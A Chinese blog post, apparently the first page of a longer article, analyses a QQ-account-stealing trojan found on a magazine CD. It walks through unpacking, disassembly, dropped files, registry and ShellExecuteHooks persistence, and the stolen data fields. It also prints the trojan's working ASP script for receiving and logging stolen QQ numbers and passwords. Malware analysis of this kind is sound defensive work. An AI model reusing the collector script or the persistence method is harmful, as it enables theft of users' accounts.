看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,动网漏洞利用动画所附带的工具会使杀毒软件报警,提示为Trojan-PSW.Win32.QQShou.ed。一想,我老魔算黑的了,居然还有比我更黑的。看来是青出于蓝……于是把这个恶意程序分析了一下,算是给自己增强手动超作的经验,也帮中了马的朋友们,把他清理的干干净净。
先PEID查壳,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],网上n多脱壳机,我这就不去DOWN,直接用PEID的UPX FILEINFO的插件,就可以轻松的获得UPX加壳程序的OEP。
这里OEP 为:4056D8 直接OD载入.F4,到4056D8把他DOWN 出来。脱壳就完毕了.再用PEID一查,Borland Delphi 6.0 - 7.0,脱壳后,是否修复就随便你了。反正我们又不运行。
用OD载入脱壳后的程序,来分析吧。
00404935 50 PUSH EAX
00404936 E8 71FCFFFF CALL <JMP.&kernel32.GetSystemDirectoryA> //返回WINDOWS系统目录路径
0040493B 85C0 TEST EAX,EAX
0040493D 75 07 JNZ SHORT 2.00404946
0040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43
00404946 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-100]
0040494C 50 PUSH EAX
0040494D E8 E2FCFFFF CALL <JMP.&USER32.IsCharAlphaA> //确定字符串是否是字母
00404952 83F8 01 CMP EAX,1
00404955 1BC0 SBB EAX,EAX
00404957 40 INC EAX
00404958 84C0 TEST AL,AL
0040495A 75 07 JNZ SHORT 2.00404963
0040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43 //这里的Hex(43)=Char(C) C盘拉~~
00404963 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404969 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-100]
0040496F E8 CCEDFFFF CALL 2.00403740
00404974 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-104]
0040497A 8BC3 MOV EAX,EBX
0040497C B9 B4494000 MOV ECX,2.004049B4 ; :\program files\internet explorer\plugins\
00404981 E8 2EEEFFFF CALL 2.004037B4
00404986 33C0 XOR EAX,EAX
00404988 5A POP EDX
00404989 59 POP ECX
0040498A 59 POP ECX
程序运行后,首先会在系统目录建立文件,路径是:
C:\Program Files\Internet Explorer\PLUGINS\
来到这个地方,你就会发现多了一个文件bow.sys动态链接库和bow.bak两个文件,怎么判断是木马生成的,你注意看看文件的生成日期就会发现。
要注意的是这个文件是隐藏的,必需显示所有文件才能看得到。
我们OD,来看看bow.sys文件的内容,
003E4E1A |. 50 PUSH EAX /pDisposition
003E4E1B |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] ; |
003E4E1F |. 50 PUSH EAX ; |pHandle
003E4E20 |. 6A 00 PUSH 0 ; |pSecurity = NULL
003E4E22 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00 PUSH 0 ; |Class = NULL
003E4E2B |. 6A 00 PUSH 0 ; |Reserved = 0
003E4E2D |. 68 744E3E00 PUSH bow.003E4E74 ; |software\ms\qqguishou
003E4E32 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF CALL <JMP.&advapi32.RegCreateKeyExA> ; \RegCreateKeyExA
写注册表,HKEY_CURRENT_USER\Software\Ms\QQGuiShou
“QQGuiShou”的拼音“QQ鬼手”?根据谷歌记载,确有此盗Q软件,
继续分析
:00407715 A124A14000 mov eax, dword ptr [0040A124]
:0040771A 8B4018 mov eax, dword ptr [eax+18]
:0040771D 50 push eax
:0040771E A124A14000 mov eax, dword ptr [0040A124]
:00407723 8B4014 mov eax, dword ptr [eax+14]
:00407726 50 push eax
* Possible StringData Ref from Code Obj ->"QQ冲击波给你送礼物啦-->("
:00407727 68947A4000 push 00407A94
:0040772C FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000 push 00407AB8
:00407734 FF75F4 push [ebp-0C]
:00407737 68C87A4000 push 00407AC8
:0040773C 8D45CC lea eax, dword ptr [ebp-34]
:0040773F BA05000000 mov edx, 00000005
:00407744 E853BDFFFF call 0040349C
:00407749 8B45CC mov eax, dword ptr [ebp-34]
:0040774C 50 push eax
* Possible StringData Ref from Code Obj ->" 号码:"
:0040774D 68D47A4000 push 00407AD4
:00407752 FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->" ----密码:"
:00407755 68E47A4000 push 00407AE4
:0040775A FF75F4 push [ebp-0C]
* Possible StringData Ref from Code Obj ->" ----可用游戏币:"
:0040775D 68F87A4000 push 00407AF8
:00407762 8D55C4 lea edx, dword ptr [ebp-3C]
:00407765 8B45DC mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF call 00404F54
:0040776D FF75C4 push [ebp-3C]
* Possible StringData Ref from Code Obj ->" ----保存的:"
:00407770 68147B4000 push 00407B14
:00407775 8D55C0 lea edx, dword ptr [ebp-40]
:00407778 8B45E0 mov eax, dword ptr [ebp-20]
:0040777B E8D4D7FFFF call 00404F54
:00407780 FF75C0 push [ebp-40]
* Possible StringData Ref from Code Obj ->" ----积分:"
:00407783 682C7B4000 push 00407B2C
:00407788 8D55BC lea edx, dword ptr [ebp-44]
:0040778B 8B45EC mov eax, dword ptr [ebp-14]
:0040778E E8C1D7FFFF call 00404F54
:00407793 FF75BC push [ebp-44]
* Possible StringData Ref from Code Obj ->" ----是否是会员:"
:00407796 68407B4000 push 00407B40
:0040779B 8D55B8 lea edx, dword ptr [ebp-48]
:0040779E 8B45D4 mov eax, dword ptr [ebp-2C]
:004077A1 E8AED7FFFF call 00404F54
:004077A6 FF75B8 push [ebp-48]
* Possible StringData Ref from Code Obj ->" ----等级:"
|
:004077A9 685C7B4000 push 00407B5C
:004077AE 8D55B4 lea edx, dword ptr [ebp-4C]
:004077B1 8B45D0 mov eax, dword ptr [ebp-30]
:004077B4 E89BD7FFFF call 00404F54
:004077B9 FF75B4 push [ebp-4C]
* Possible StringData Ref from Code Obj ->" ----游戏点:"
|
:004077BC 68707B4000 push 00407B70
:004077C1 8D55B0 lea edx, dword ptr [ebp-50]
:004077C4 8B45E4 mov eax, dword ptr [ebp-1C]
:004077C7 E888D7FFFF call 00404F54
:004077CC FF75B0 push [ebp-50]
* Possible StringData Ref from Code Obj ->" ----IP: "
“QQ冲击波给你送礼物啦!”果然是大礼,通过到QQ站上的查询,把你的QQ
号码:密码:可用游戏币:否是会员:积分:等级:游戏点:IP,所有的信息都当做礼物送出去了。写入自身的sys到这里面。还加上程序后面的配置信息。
哎.现在的木马是越做越好….采用的ASP网页形式post提交,保存接收的密码,有兴趣的朋友可以抓个包看看,我这里就不去抢劫别人的劳动果实了。接收密码ASP代码如下:
<%
LogFile="log.txt"
LogFileGB="LOGGB.txt"
QQNumber=request("Number")
QQPassWord=request("PassWord")
QQGBA=request("yxba")
QQGBB=request("yxbb")
if QQGBA="" then
QQGBA="no"
end if
if QQGBB="" then
QQGBB="no"
end if
LogText=QQNumber&"----"&QQPassWord
LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBB
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)
ff.writeline(LogText)
ff.close
set ff=nothing
set f=nothing
set f1=Server.CreateObject("scripting.filesystemobject")
set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)
ff1.writeline(LogTextGB)
ff1.close
set ff1=nothing
set f1=nothing
%>
00404AFB 55 PUSH EBP
00404AFC 68 A04B4000 PUSH 2.00404BA0
00404B01 64:FF30 PUSH DWORD PTR FS:[EAX]
00404B04 64:8920 MOV DWORD PTR FS:[EAX],ESP
00404B07 68 AC4B4000 PUSH 2.00404BAC
00404B0C B9 B04B4000 MOV ECX,2.00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B11 BA D84B4000 MOV EDX,2.00404BD8 ; software\microsoft\windows\currentversion\explorer\shellexecutehooks
00404B16 B8 02000080 MOV EAX,80000002
00404B1B E8 70FFFFFF CALL 2.00404A90
00404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B23 BA 284C4000 MOV EDX,2.00404C28 ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B28 E8 8BEBFFFF CALL 2.004036B8
00404B2D 68 AC4B4000 PUSH 2.00404BAC
00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00404B35 E8 1EEEFFFF CALL 2.00403958
00404B3A 8BD0 MOV EDX,EAX
00404B3C B9 AC4B4000 MOV ECX,2.00404BAC
00404B41 B8 00000080 MOV EAX,80000000
00404B46 E8 45FFFFFF CALL 2.00404A90
00404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B4E BA 604C4000 MOV EDX,2.00404C60 ; \inprocserver32apartment
00404B53 E8 18ECFFFF CALL 2.00403770
[1] [2] 下一页
[推荐]分析黑防光盘中的QQ黑手
您现在的位置: